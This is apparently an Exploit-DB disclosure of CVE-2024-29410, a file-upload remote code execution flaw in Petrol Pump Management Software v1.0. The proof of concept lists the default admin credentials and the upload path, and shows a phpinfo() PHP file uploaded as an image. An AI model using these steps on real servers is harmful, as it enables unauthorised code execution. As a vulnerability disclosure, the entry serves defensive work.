Petrol Pump Management Software v1.0 – Remote Code Execution (RCE)

  • 作者: Sandeep Vishwakarma
    日期: 2024-04-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51943/
  • # Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
    # Date: 02/04/2024
    # Exploit Author: Sandeep Vishwakarma
    # Vendor Homepage: https://www.sourcecodester.com
    # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
    # Version: v1.0
    # Tested on: Windows 10
    # CVE: CVE-2024-29410
    # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
    # POC:
    1. Here we go to : http://127.0.0.1/fuelflow/index.php
    2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
    3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
    4. Upload the san.php file in "Image" field
    5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
    6. The content of san.php file is given below: <?php phpinfo();?>
    
    # Reference:
    https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md